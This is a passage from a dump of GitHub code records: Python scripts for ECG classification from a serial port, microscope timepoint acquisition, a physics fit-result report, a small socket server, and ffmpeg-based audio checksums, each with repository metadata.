Search\",\"KSS\":\"K Star Search\"}\n maze = Maze(sys.argv[1])\n if len(sys.argv) == 3:\n algorithm = sys.argv[2]\n else:\n algorithm = \"KSS\"\n maze.solve(algorithm=algorithm)\n maze.print()\n print(\"Path explored : \",maze.num_explored)\n print(\"Way length : \",len(maze.solution[1]))\n print(\"Algorithm : \",alg[algorithm])\nif __name__ == '__main__':\n main()\n","repo_name":"TheShubhendra/maze-solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"42102362139","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 27 20:13:06 2022\n@author: Daniel\n\"\"\"\n\n############################## SE IMPORTAN LIBRERIAS ##########################\nimport pandas as pd\nimport serial\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nfrom itertools import count\nfrom matplotlib.animation import FuncAnimation\nimport multiprocessing\nimport time\n\nimport scipy.signal\nimport funcion_BPK_mt as fn\nimport pyhrv\nimport pyhrv.nonlinear as nl\nimport pyhrv.tools as tools\nimport biosppy\nimport nolds\nimport spectrum\n\nimport sklearn as sk\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport random\nfrom joblib import dump, load\n################### GUARDAR LO QUE VIENE DEL SERIAL EN UN BUFFER###############\nser = serial.Serial(\n port= ('COM9'),\n baudrate = 115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\ndatos = []\ndata_list = [] #Aqui se guardan los df en distintos segundos\nsave_predictions = []\nn_list = 0 #Que version de la lista estoy leyendo\nval = 5\nval_stop = 19\n\n \n######################### Funcion formato de tiempo a Segundos###############\ndef to_seconds(hora):\n m, s, ms, = hora.split(\" \")\n #return int(mins)*360 + int(segs) + float(ms)\n return int(m)*60 + int(s) + int(ms)/1000\ndef grafica():\n Wn = 0.2 #Cut out frequencies higher 50 hZ\n b, a = scipy.signal.butter(4,Wn, 'low', analog = False) #filtro orden 4\n heart_data_filtered = scipy.signal.filtfilt(b,a,df.ecg)\n return heart_data_filtered\n\n\n\n\n\nwhile 1:\n try:\n if ser.inWaiting() != 0:\n read_line = ser.readline()\n decoded_line = read_line.decode('utf-8').rstrip()\n datos.append(decoded_line) #agrego datos a lo ultimo de la lista\n print (decoded_line)\n if ser.inWaiting() == 0:\n #global df\n df = pd.DataFrame(datos) \n df = df[0].str.split(',', expand = True) #separa por comas\n df[0] = df[0].str.replace(\"'\",\"\") # Remove quotes \n df[0] = df[0].str.replace(\":\",\" \") # add space \n df[0] = df[0].str.replace(\".\",\" \") # add space \n df[0] = df[0].map(to_seconds)\n df.columns = ['time','ecg']\n df['ecg']=df['ecg'].astype(float)\n \n #df[['time','ecg']] = df[['time','ecg']].astype(int)\n \n\n print(\"Quiero ver cuantas veces te actualizas\")\n if df[df.eq(val).any(1)].empty == False: #Si esta lleno, ejecutar funcion\n \n data_list.append(df)\n df = df.iloc[0:0] #vacio el dataframe\n datos.clear()\n val = val+5\n \n print ('****************** Si se encontro ************************')\n #######################Filto Butterworth #########################\n Wn = 0.2 #Cut out frequencies higher 50 hZ\n b, a = scipy.signal.butter(4,Wn, 'low', analog = False) #filtro orden 4\n heart_data_filtered = scipy.signal.filtfilt(b,a,data_list[n_list].ecg)\n\n ################################# Graficas ##################################\n plt.figure(1)\n plt.plot(data_list[n_list].time, data_list[n_list].ecg)\n plt.plot(data_list[n_list].time, heart_data_filtered)\n plt.xlabel('Segundos (S)')\n plt.ylabel('Milivoltios (mV)')\n \n plt.show()\n plt.pause(0.02) \n ############################# Posicion picos ################################\n voltaje = 0.4\n picos,_ = scipy.signal.find_peaks(heart_data_filtered,height=(voltaje))\n plt.figure(2)\n plt.plot(data_list[n_list].time, heart_data_filtered)\n plt.plot(data_list[n_list].time[picos], heart_data_filtered[picos],\"X\")\n plt.axhline(voltaje, color = 'black', label = 'threshold')\n plt.xlabel('Segundos (S)')\n plt.ylabel('Milivoltios (mV)')\n \n plt.show()\n plt.pause(0.02)\n ############################ better peak finder #############################\n\n # Function that looks the peaks on the derivative\n d_ecg, peaks_d_ecg = fn.decg_peaks(heart_data_filtered, data_list[n_list].time)\n plt.figure(3)\n plt.show()\n plt.pause(0.02)\n \n #Function with other parameters as height and x distance 0.65\n #Corrige los picos 0.59\n Rwave_peaks_d_ecg = fn.d_ecg_peaks(d_ecg,peaks_d_ecg,data_list[n_list].time,0.6,0.4)\n plt.figure(4)\n plt.show()\n plt.pause(0.02)\n \n #Grafica donde vemos la derivada y la original, pero comparando los picos de \n #ambas graficas y poniendo el pico de la derivada en la original, esto para\n #descaratar falsos picos en la lectura del ECG\n Rwave_t = fn.Rwave_peaks(heart_data_filtered, d_ecg, Rwave_peaks_d_ecg,data_list[n_list].time)\n # plt.figure(5)\n plt.show()\n plt.pause(0.02)\n \n ################################ RR interval ###############################\n #comparamos un data point de un pico con el otro datapoint del siguiente pico\n\n RR_intervalo = 1/2*np.diff(Rwave_t) #Despues de la derivada\n nni_results = nl.poincare(RR_intervalo, ellipse= True, vectors= True, legend= True)\n \n\n # SD1 (T) REFLEJA LA VARIACIÓN DE LATIDO A LATIDO / Variabilidad latido a latido\n SD1 = nni_results['sd1']\n # SD2 (L) RELFLEJA LAS FLUCTUACIONES GENERALES / Variabilidad en el tiempo\n SD2 = nni_results['sd2']\n centro = nni_results['centro']\n #plt.figure(6)\n #plt.show()\n plt.pause(0.02)\n\n\n print('SD1 es:',SD1)\n print('SD2 es:',SD2)\n print('Centro es: ',centro)\n \n ################################ MODELO ENTRENADO #############################\n model = load(r'Z:\\Universidad UVG\\Sexto Año\\Segundo Ciclo\\Tesis\\Tesis-2022-Erick-Aquino\\Varilla Programadora\\Códigos_modo_automático\\Python_ECG\\Modelo_entrenado.joblib')\n input_data = (SD1,SD2,centro) #ejercicio NEW16\n #input_data = (8.142530319255803,10.335337440064551,355.4230769230769) #Resposo P10_1\n #input_data = (9.630635074824735,16.05824359947251,365.92) #Resposo P10_2\n #input_data = (10.002720718319964,19.43872283814529,421.72727272727275) #R#esposo P10_5\n\n #cambiando un poco to numpy array\n input_data_as_numpy_array = np.asarray(input_data)\n\n #reshape the numpy array as we are predicting for only one instance\n input_data_reshape = input_data_as_numpy_array.reshape(1,-1)\n\n prediction = model.predict(input_data_reshape)\n save_predictions.append(prediction[0])\n print(prediction)\n if (prediction[0]==0):\n print('La persona esta en reposo según su ECG')\n else:\n print('La persona esta haciedo un esfuerzo físico según su ECG')\n \n ############### Actualizar contadores ###########################\n n_list = n_list + 1\n ###############################################\n #grafica()\n #p1 = multiprocessing.Process(target=grafica)\n #p1.start()\n #p1.join()\n #p1 = multiprocessing.Process(target=grafica)\n if df[df.eq(val_stop).any(1)].empty == False: #Si esta lleno, ejecutar funcion\n ser.close()\n break\n \n except KeyboardInterrupt:\n ser.close()\n except NameError:\n continue\nprint ('El resumen de predicciones de cada 20 segs es:',save_predictions)\n'''\nguardar_datos = input('¿Quieres guardar los datos para un análisis posterior? Y/N ')\n\nif guardar_datos == \"Y\":\n print(\"Se han guardado los valores\")\nelif guardar_datos == \"N\":\n print(\"No se han guardado los valores\")\nelse:\n print(\"No es un caracter válido\")\n '''","repo_name":"TheDany4545/Tesis-2022-Erick-Aquino","sub_path":"Varilla Programadora/Códigos_modo_automático/Multiprocessing/Multiprocessing.py","file_name":"Multiprocessing.py","file_ext":"py","file_size_in_byte":8351,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18222500280","text":"import sys\nimport time\nimport pathlib\nimport json\nimport logging\nimport inspect\nimport concurrent.futures as futures\n\nfrom ..util import json_encode\nfrom ..util import threaded_image_io\nfrom ..util import log_util\n\nclass DummyIO:\n def __init__(self, logger):\n self.logger = logger\n def write(*args, **kws):\n self.logger.warn('Trying to write files, but file writing was disabled!')\n\nclass TimepointHandler:\n IMAGE_COMPRESSION = threaded_image_io.COMPRESSION.DEFAULT\n LOG_LEVEL = logging.INFO\n IO_THREADS = 4\n\n def __init__(self, data_dir, log_level=None, scope_host='127.0.0.1', dry_run=False):\n \"\"\"Setup the basic code to take a single timepoint from a timecourse experiment.\n\n Parameters:\n data_dir: directory where the data and metadata-files should be read/written.\n io_threads: number of threads to use to save image data out.\n loglevel: level from logging library at which to log information to the\n logfile in data_dir. (Subclasses can log information with self.logger)\n If not specified, fall back to the class attribute LOG_LEVEL. This\n allows a subclass to set a default log level, which still can be\n over-ridden from the command line.\n scope_host: IP address to connect to the scope server. If None, run without\n a scope server.\n dry_run: if True, do not write any files (including log files; log entries\n will be printed to the console).\n \"\"\"\n self.data_dir = pathlib.Path(data_dir)\n self.experiment_metadata_path = self.data_dir / 'experiment_metadata.json'\n with self.experiment_metadata_path.open('r') as f:\n self.experiment_metadata = json.load(f)\n self.positions = self.experiment_metadata['positions'] # dict mapping names to (x,y,z) stage positions\n self.skip_positions = set(self.experiment_metadata.setdefault('skip_positions', []))\n if scope_host is not None:\n from .. import scope_client\n self.scope, self.scope_properties = scope_client.client_main(scope_host)\n if hasattr(self.scope, 'camera'):\n self.scope.camera.return_to_default_state()\n else:\n self.scope = None\n self.write_files = not dry_run\n self.logger = log_util.get_logger(str(data_dir))\n if log_level is None:\n log_level = self.LOG_LEVEL\n elif isinstance(log_level, str):\n log_level = getattr(logging, log_level)\n self.logger.setLevel(log_level)\n if self.write_files:\n self.image_io = threaded_image_io.ThreadedIO(self.IO_THREADS)\n handler = logging.FileHandler(str(self.data_dir/'acquisitions.log'))\n else:\n self.image_io = DummyIO(self.logger)\n handler = logging.StreamHandler()\n handler.setFormatter(log_util.get_formatter())\n self.logger.addHandler(handler)\n self._job_thread = futures.ThreadPoolExecutor(max_workers=1)\n\n def run_timepoint(self, scheduled_start):\n try:\n self.timepoint_prefix = time.strftime('%Y-%m-%dt%H%M')\n self.scheduled_start = scheduled_start\n self.start_time = time.time()\n self._job_futures = []\n self.logger.info('Starting timepoint {} ({:.0f} minutes after scheduled)', self.timepoint_prefix,\n (self.start_time-self.scheduled_start)/60)\n # record the timepoint prefix and timestamp for this timepoint into the\n # experiment metadata\n self.experiment_metadata.setdefault('timepoints', []).append(self.timepoint_prefix)\n self.experiment_metadata.setdefault('timestamps', []).append(self.start_time)\n self.configure_timepoint()\n for position_name, position_coords in sorted(self.positions.items()):\n if position_name not in self.skip_positions:\n self.run_position(position_name, position_coords)\n self.experiment_metadata['skip_positions'] = list(self.skip_positions)\n self.finalize_timepoint()\n self.end_time = time.time()\n self.experiment_metadata.setdefault('durations', []).append(self.end_time - self.start_time)\n if self.write_files:\n with self.experiment_metadata_path.open('w') as f:\n json_encode.encode_legible_to_file(self.experiment_metadata, f)\n run_again = self.skip_positions != self.positions.keys() # don't run again if we're skipping all the positions\n if self._job_futures:\n self.logger.debug('Waiting for background jobs')\n t0 = time.time()\n # wait for all queued background jobs to complete.\n futures.wait(self._job_futures)\n # now get the result() from each future, which will raise any errors encountered\n # during the execution.\n [f.result() for f in self._job_futures]\n self.logger.debug('Background jobs complete ({:.1f} seconds)', time.time()-t0)\n self.logger.info('Timepoint {} ended ({:.0f} minutes after starting)', self.timepoint_prefix,\n (time.time()-self.start_time)/60)\n if run_again:\n return self.get_next_run_time()\n except:\n self.logger.error('Exception in timepoint:', exc_info=True)\n raise\n\n def add_background_job(self, function, *args, **kws):\n \"\"\"Add a function with parameters *args and **kws to a queue to be completed\n asynchronously with the rest of the timepoint acquisition. This will be\n run in a background thread, so make sure that the function acts in a\n threadsafe manner. (NB: self.logger *is* thread-safe.)\n\n All queued functions will be waited for completion before the timepoint\n ends. Any exceptions will be propagated to the foreground after all\n functions queued either finish or raise an exception.\n \"\"\"\n self._job_futures.append(self._job_thread.submit(function, *args, **kws))\n\n def configure_timepoint(self):\n \"\"\"Override this method with global configuration for the image acquisitions\n (e.g. camera configuration). Member variables 'scope', 'experiment_metadata',\n 'timepoint_prefix', and 'positions' may be specifically useful.\"\"\"\n pass\n\n def finalize_timepoint(self):\n \"\"\"Override this method with global finalization after the images have been\n acquired for each position. Useful for altering the self.experiment_metadata\n dictionary before it is saved out.\n\n Note that positions added to self.skip_positions are automatically added\n to the metadata, so it is unnecessary to do this here.\n \"\"\"\n pass\n\n def get_next_run_time(self):\n \"\"\"Override this method to return when the next timepoint run should be\n scheduled. Returning None means no future runs will be scheduled.\"\"\"\n return None\n\n def run_position(self, position_name, position_coords):\n \"\"\"Do everything required for taking a timepoint at a single position\n EXCEPT focusing / image acquisition. This includes moving the stage to\n the right x,y position, loading and saving metadata, and saving image\n data, as generated by acquire_images()\"\"\"\n self.logger.info('Acquiring Position: {}', position_name)\n t0 = time.time()\n position_dir = self.data_dir / position_name\n if not position_dir.exists():\n position_dir.mkdir()\n metadata_path = position_dir / 'position_metadata.json'\n if metadata_path.exists():\n with metadata_path.open('r') as f:\n position_metadata = json.load(f)\n else:\n position_metadata = []\n timestamp = time.time()\n\n if self.scope is not None:\n self.scope.stage.position = position_coords\n t1 = time.time()\n self.logger.debug('Stage Positioned ({:.1f} seconds)', t1-t0)\n images, image_names, new_metadata = self.acquire_images(position_name, position_dir,\n position_metadata)\n t2 = time.time()\n self.logger.debug('{} Images Acquired ({:.1f} seconds)', len(images), t2-t1)\n image_paths = [position_dir / (self.timepoint_prefix + ' ' + name) for name in image_names]\n if new_metadata is None:\n new_metadata = {}\n new_metadata['timestamp'] = timestamp\n position_metadata.append(new_metadata)\n if self.write_files:\n self.image_io.write(images, image_paths, self.IMAGE_COMPRESSION)\n with metadata_path.open('w') as f:\n json_encode.encode_legible_to_file(position_metadata, f)\n t3 = time.time()\n self.logger.debug('Images saved ({:.1f} seconds)', t3-t2)\n self.logger.debug('Position done (total: {:.1f} seconds)', t3-t0)\n\n def acquire_images(self, position_name, position_dir, position_metadata):\n \"\"\"Override this method in a subclass to define the image-acquisition sequence.\n\n All most subclasses will need to do is return the following as a tuple:\n (images, image_names, new_metadata), where:\n images is a list of the acquired images\n image_names is a list of the generic names for each of these images\n (not timepoint- or position-specific; e.g. 'GFP.png' or some such)\n new_metadata is a dictionary of timepoint-specific information, such\n as the latest focal plane z-position or similar. This will be\n made available to future acquisition runs via the 'position_metadata'\n argument described below.\n\n The images and metadata will be written out by the superclass, and\n must not be written by the overriding subclass.\n\n Optionally, subclasses may choose to enter 'position_name' into the\n self.skip_positions set to indicate that in the future this position\n should not be acquired. (E.g. the worm is dead.)\n\n Parameters:\n position_name: identifier for this image-acquisition position. Useful\n for adding this position to the skip_positions set.\n position_dir: pathlib.Path object representing the directory where\n position-specific data files and outputs should be written. Useful\n only if additional data needs to be read in or out during\n acquisition. (E.g. a background model or similar.)\n position_metadata: list of all the stored position metadata from the\n previous timepoints, in chronological order. In particular, this\n dictionary is guaranteed to contain 'timestamp' which is the\n time.time() at which that acquisition was started. Other values\n (such as the latest focal plane) stored by previous acquisition\n runs will also be available. The most recent metadata will be in\n position_metadata[-1].\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def main(cls, timepoint_dir=None, **cls_init_args):\n \"\"\"Main method to run a timepoint.\n\n Parse sys.argv to find an (optional) scheduled_start time as a positional\n argument. Any arguments that contain an '=' will be assumed to be\n python variable definitions to pass to the class init method. (Leading\n '-' or '--' will be stripped, and internal '-'s will be converted to '_'.)\n\n e.g. this allows the following usage: ./acquire.py --dry-run=True --log-level=logging.DEBUG\n\n Parameters:\n timepoint_dir: location of timepoint directory. If not specified, default\n to the parent dir of the file that defines the class that this\n method is called on.\n **cls_init_args: dict of arguments to pass to the class init method.\n \"\"\"\n if timepoint_dir is None:\n timepoint_dir = pathlib.Path(inspect.getfile(cls)).parent\n scheduled_start = None\n for arg in sys.argv[1:]:\n if arg.count('='):\n while arg.startswith('-'):\n arg = arg[1:]\n arg = arg.replace('-', '_')\n # execute the argument in a restricted namespace containing only 'logging', and store the\n # result in the args to pass to the class.\n exec(arg, dict(logging=logging), cls_init_args)\n elif scheduled_start is None:\n scheduled_start = float(arg)\n else:\n raise ValueError('More than one schedule start time provided')\n\n if scheduled_start is None:\n scheduled_start = time.time()\n handler = cls(timepoint_dir, **cls_init_args)\n next_run_time = handler.run_timepoint(scheduled_start)\n if next_run_time:\n print(next_run_time)\n\n","repo_name":"erikhvatum/zplab","sub_path":"rpc_acquisition/scope/timecourse/base_handler.py","file_name":"base_handler.py","file_ext":"py","file_size_in_byte":13035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15849124130","text":"#!/usr/bin/env python3\n\"\"\"\nScript to make a basic fit result summary pdf\n\"\"\"\n\nimport os\nimport json\nimport sys\n\nfrom argparse import Namespace\n\n#sys.path.append('/tmp/chib_chic_polFW/python/')\n'''\nfrom ...chib_chic_polFW.python.utils.reporting import open_tex_file, create_figure\nfrom ...chib_chic_polFW.python.utils.data_handling import get_dataframe\nfrom ...chib_chic_polFW.python.utils.misc_helpers import fmt_float\n'''\n\nfrom utils.reporting import open_tex_file, create_figure\nfrom utils.data_handling import get_dataframe\nfrom utils.misc_helpers import fmt_float\n\nimport make_fit_result_plots as plots\nfrom make_fit_par_table import create_table, get_vals_uncers, print_val\n\nPRETTY_PAR = {\n # LDMEs\n 'l_3S1_8_c0': r'$\\ldme{\\chi_{c0}}{\\Swave{3}{1}{8}}$',\n 'l_3P0_1_c0': r'$\\ldme{\\chi_{c0}}{\\Pwave{0}{1}}$',\n\n 'l_3S1_1_jpsi': r'$\\ldme{J/\\psi}{\\Swave{3}{1}{1}}$',\n 'l_3S1_8_jpsi': r'$\\ldme{J/\\psi}{\\Swave{3}{1}{8}}$', # derived\n 'l_3PJ_8_jpsi': r'$\\ldme{J/\\psi}{\\Pwave{J}{8}}$', # derived\n\n 'l_3S1_1_psip': r'$\\ldme{\\psi(2S)}{\\Swave{3}{1}{1}}$',\n 'l_3S1_8_psip': r'$\\ldme{\\psi(2S)}{\\Swave{3}{1}{8}}$', # derived\n 'l_3PJ_8_psip': r'$\\ldme{\\psi(2S)}{\\Pwave{J}{8}}$', # derived\n\n 'l_1S0_8_jpsi': r'$\\ldme{J/\\psi}{\\Swave{1}{0}{8}}$',\n 'l_1S0_8_psip': r'$\\ldme{\\psi(2S)}{\\Swave{1}{0}{8}}$',\n\n # LDME ratios\n 'l_r_3PJ_8_1S0_8_jpsi': r'$\\ldmeratio{\\Pwave{J}{8}}{J/\\psi}$',\n 'l_r_3S1_8_1S0_8_jpsi': r'$\\ldmeratio{\\Swave{3}{1}{8}}{J/\\psi}$',\n\n # double ratios\n 'l_rr_3PJ_8_1S0_8_psip_jpsi': r'$\\ldmedr{\\Pwave{J}{8}}$',\n 'l_rr_3S1_8_1S0_8_psip_jpsi': r'$\\ldmedr{\\Swave{3}{1}{8}}$',\n\n # costh ratio norms\n 'norm_costh_1': r'$n_{1}$',\n 'norm_costh_2': r'$n_{2}$',\n 'norm_costh_3': r'$n_{3}$',\n\n # Nuisance params\n 'br_psip_dp': r'\\br{\\psi(2S)}{J/\\psi \\pi\\pi}',\n 'br_psip_mm': r'\\br{\\psi(2S)}{\\mu\\mu}',\n 'br_psip_c2': r'\\br{\\psi(2S)}{\\chi_{c2}}',\n 'br_psip_c1': r'\\br{\\psi(2S)}{\\chi_{c1}}',\n 'br_psip_jpsi': r'\\br{\\psi(2S)}{J/\\psi}',\n 'br_c2_jpsi': r'\\br{\\chi_{c2}}{J/\\psi}',\n 'br_c1_jpsi': r'\\br{\\chi_{c1}}{J/\\psi}',\n 'br_jpsi_mm': r'\\br{J/\\psi}{\\mu\\mu}',\n 'L_ATLAS': r'\\lumi{ATLAS}',\n 'L_CMS': r'\\lumi{ATLAS}'\n}\n\nDERIV_PARS = (\n 'l_3S1_8_jpsi',\n 'l_3PJ_8_jpsi',\n 'l_3S1_8_psip',\n 'l_3PJ_8_psip',\n)\n\nNUISANCE_PARS = (\n 'norm_costh_1',\n 'norm_costh_2',\n 'norm_costh_3',\n 'br_psip_dp',\n 'br_psip_mm',\n 'br_psip_c2',\n 'br_psip_c1',\n 'br_psip_jpsi',\n 'br_c2_jpsi',\n 'br_c1_jpsi',\n 'br_jpsi_mm',\n 'L_ATLAS',\n 'L_CMS',\n)\n\nPREAMBLE = r'''\\documentclass[a4paper, 11pt]{scrartcl}\n\n\\usepackage{graphicx}\n\\usepackage{subfig}\n\\usepackage[margin=2cm]{geometry}\\usepackage{tabulary}\n\\usepackage{multirow}\n\\usepackage{amsmath}\n\n\\newcommand{\\lumi}[1]{$\\mathcal{L}_{\\textrm{#1}}$}\n\\newcommand{\\br}[2]{$\\mathcal{B}(#1 \\to #2)$}\n\\newcommand{\\Swave}[3]{{}^{#1}S_{#2}^{[#3]}}\n\\newcommand{\\Pwave}[2]{{}^{3}P_{#1}^{[#2]}}\n\\newcommand{\\ldme}[2]{\\mathcal{O}^{#1}(#2)}\n\\newcommand{\\ldmeratio}[2]{\\mathcal{R}_{#2}(#1, \\Swave{1}{0}{8})}\n\\newcommand{\\ldmedr}[1]{\\mathcal{RR}(#1, \\Swave{1}{0}{8})}\n'''\n\nSYMBOL_CAPTION = r'''\n$\\mathcal{R}_{\\mathcal{Q}}(X, Y) \\equiv \\ldme{\\mathcal{Q}}{X} / \\ldme{\\mathcal{Q}}{Y}$.\n$\\mathcal{RR}(X, Y) \\equiv \\mathcal{R}_{\\psi(2S)}(X, Y) / \\mathcal{R}_{J/\\psi}(X, Y)$\n'''\n\nPLOTS_TO_USE = (\n 'combined_cs.pdf',\n 'psi_pol.pdf',\n 'chic_ratio_cs.pdf',\n 'costh_ratio_ptm_3p29.pdf',\n 'costh_ratio_ptm_4p64.pdf',\n 'costh_ratio_ptm_7p10.pdf',\n)\n\nPLOT_DIR = 'plots_for_report'\n\ndef add_fit_plots(plot_dir):\n \"\"\"Add the plots from the plot_dir relative to the result dir\"\"\"\n def _label(pdf_name):\n return pdf_name.replace('.pdf', '').replace('_', r'\\_')\n\n return create_figure({_label(p): f'./{plot_dir}/{p}' for p in PLOTS_TO_USE})\n\ndef pretty_label(par):\n \"\"\"Get a pretty label if one exists\"\"\"\n if par in PRETTY_PAR: return PRETTY_PAR[par]\n return par.replace('_', r'\\_')\n\ndef get_par_indices(res_file):\n \"\"\"Get the parameter indices in the order in which they should appear in the table\"\"\"\n dfr = get_dataframe(res_file, 'parameter_indices')\n all_indices = {p: i for p, i in zip(dfr.columns, dfr.values[0])}\n\n # Sort all the nuiscance parameters to the end\n indices = {}\n for par, idx in all_indices.items():\n if par not in NUISANCE_PARS:\n indices[par] = idx\n\n for par, idx in all_indices.items():\n if par in NUISANCE_PARS:\n indices[par] = idx\n\n return indices\n\ndef add_fit_param_table(res_file):\n \"\"\"Add the fit parameter table from the fit result file (relative to the result dir)\"\"\"\n par_indices = get_par_indices(res_file)\n\n vals_uncers = get_vals_uncers(res_file, par_indices)\n\n rows = [r'parameter & best-fit value \\\\ \\hline']\n have_line = False\n for par, (val, err) in vals_uncers.items():\n if not have_line and par in NUISANCE_PARS:\n # Insert a separation between nuisance params and others\n rows.append(r'\\hline\\hline')\n have_line = True\n\n rows.append(\n fr'{pretty_label(par)} & ${fmt_float(val)} \\pm {fmt_float(err)}$ \\\\'\n )\n\n return create_table(rows, 'l | c', caption='Fit parameter values. ' + SYMBOL_CAPTION)\n\ndef add_deriv_par_table(data):\n \"\"\"Add the table with the derived parameters\"\"\"\n rows = [r'parameter & value \\\\ \\hline']\n\n for par in DERIV_PARS:\n rows.append(fr'{pretty_label(par)} & {print_val(data, par)} \\\\')\n\n return create_table(rows, 'l | c', caption='Derived parameter values at $p_{T}/M = 5$')\n\ndef add_fit_quality_info(res_dir):\n \"\"\"Add some information about the fit quality\"\"\"\n lines = []\n with open(f'{res_dir}/fit_result_info.json', 'r') as infof:\n fit_info = json.load(infof)\n\n lines.append(fr'Number of fitted data points: {fit_info[\"n_data\"]}')\n lines.append(fr'Total number of free parameters: {fit_info[\"n_pars\"]}')\n lines.append(fr'Number of nuisance parameters: {fit_info[\"n_nuis\"]}')\n lines.append(fr'$\\chi^{2}$ / ndf = {fit_info[\"chi2\"]} / {fit_info[\"ndf\"]}')\n\n return r'\\\\'.join(lines)\n\ndef main(args):\n \"\"\"Main\"\"\"\n graphfile = os.path.join(args.resultdir, 'fit_graphs_and_models_nrqcd_global_fit.root')\n\n # Produce the plots\n plot_args = Namespace(graphfile=graphfile, outdir=f'{args.resultdir}/{PLOT_DIR}')\n plots.main(plot_args)\n\n # Scan data loading\n scan_data = get_dataframe(f'{args.resultdir}/param_scan_ptm5.root')\n\n with open_tex_file(f'{args.resultdir}/fit_results_report.tex', PREAMBLE) as texfile:\n texfile.write(add_fit_quality_info(args.resultdir))\n\n texfile.write(add_fit_plots(PLOT_DIR))\n texfile.write('\\n')\n\n texfile.write(add_fit_param_table(f'{args.resultdir}/fit_results_nrqcd_global_fit.root'))\n texfile.write('\\n')\n\n texfile.write(add_deriv_par_table(scan_data))\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Script to generate an overview fit result pdf')\n parser.add_argument('resultdir', help='Directory containing the fit results')\n\n clargs = parser.parse_args()\n main(clargs)\n","repo_name":"nooraangelva/Global-fit-package","sub_path":"chic_pol_global_fit/python/make_fit_result_report.py","file_name":"make_fit_result_report.py","file_ext":"py","file_size_in_byte":7151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7076173330","text":"# Leer por teclado numeros y guardarlos en una lista. Finaliza cuando se introduce uno negativo. Muestra el máximo y los pares.\n\nesPositivo = True\nlista = []\nwhile(esPositivo):\n numero = int(input(\"Introduzca un numero: \"))\n if numero > 0:\n lista.append(numero)\n else:\n esPositivo = False\n print(\"El numero mas grande es:\",max(lista))\n for i in lista:\n if i % 2 == 0:\n print(i)\n","repo_name":"dd8888/curso-Python3","sub_path":"Ejercicios4/ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37433584599","text":"import random\n\nclass Util:\n @staticmethod\n def generar_numero_aleatorio(minimo, maximo):\n \"\"\"\n Genera un número entero aleatorio entre los valores especificados.\n\n Args:\n minimo (int): Valor mínimo.\n maximo (int): Valor máximo.\n\n Returns:\n int: Número aleatorio entre minimo y maximo.\n \"\"\"\n return random.randint(minimo, maximo)\n","repo_name":"pablo44445/Pruebas_de_software_tarea_1","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1910001431","text":"import socket\nimport time\nimport concurrent.futures\nimport threading\nimport conn_pool\n\n\nclass Server(object):\n '''\n Socket for listening\n\n How to use:\n create server in main thread,\n call start in new thread,\n call stop in main thread\n '''\n\n def __init__(self, port):\n self.soc = socket.socket()\n #address = (socket.gethostname(), port)\n address = (\"127.0.0.1\", port)\n \n self.soc.bind(address)\n self.soc.listen(5)\n\n self.port = self.soc.getsockname()[1]\n \n self.flag_run = True\n self.conn_list = []\n self.lock = threading.Lock()\n \n def start(self, conn_cb):\n '''start server\n\n this function is blocking, should start in a separate thread'''\n try:\n while self.flag_run:\n conn,addr = self.soc.accept()\n print('received conn: ',addr)\n self.lock.acquire()\n conn_cb(conn)\n\n self.lock.release()\n except Exception as err:\n #print(err)\n pass\n print('server stopped')\n\n def stop(self):\n self.lock.acquire()\n self.flag_run = False\n self.soc.close()\n\n\n\nif __name__ == '__main__':\n server = Server(9999)\n pool = conn_pool.ConnPool(conn_pool.ConnOperator)\n g = lambda: pool.run()\n f = lambda : server.start(pool)\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=4)\n executor.submit(f)\n executor.submit(g)\n input('')\n pool.close()\n server.stop()\n executor.shutdown()\n ","repo_name":"brbrss/bt","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74064865189","text":"from subprocess import check_output\n\nfrom enum import Enum, auto\n\nfrom ... import BIN_FFMPEG\n\n\nclass ChecksumType(Enum):\n PCM_S24LE = auto()\n RAW_STREAM = auto()\n RAW_FILE = auto()\n\n\ndef get_checksum_in_24bit(file_name_full):\n # use ffmpeg to check raw audio stream's sha, converted to 24bit `pcm_s24le`\n # this is sufficient for practically all non-DSD files.\n ffmpeg_output = check_output(\n [\n BIN_FFMPEG,\n \"-i\", file_name_full,\n \"-vn\",\n \"-c:a\", \"pcm_s24le\",\n \"-f\", \"hash\",\n \"-hash\", \"sha256\",\n \"-\"\n ]\n ).decode()\n\n dummy, result = ffmpeg_output.strip().split('=')\n assert dummy == 'SHA256'\n return {\n ChecksumType.PCM_S24LE: result,\n }\n\n\ndef get_checksum_in_raw_stream(file_name_full):\n # for DSD (non-ISO), use the original stream\n ffmpeg_output = check_output(\n [\n BIN_FFMPEG,\n \"-i\", file_name_full,\n \"-vn\",\n \"-c:a\", \"copy\",\n \"-f\", \"hash\",\n \"-hash\", \"sha256\",\n \"-\"\n ]\n ).decode()\n\n dummy, result = ffmpeg_output.strip().split('=')\n assert dummy == 'SHA256'\n return {\n ChecksumType.RAW_STREAM: result,\n }\n\n\ndef get_checksum_in_raw_file(file_name_full):\n # for SACD ISO, use the original file as a whole\n ffmpeg_output = check_output(\n [\n 'shasum',\n \"-a\"\n \"256\",\n file_name_full\n ]\n 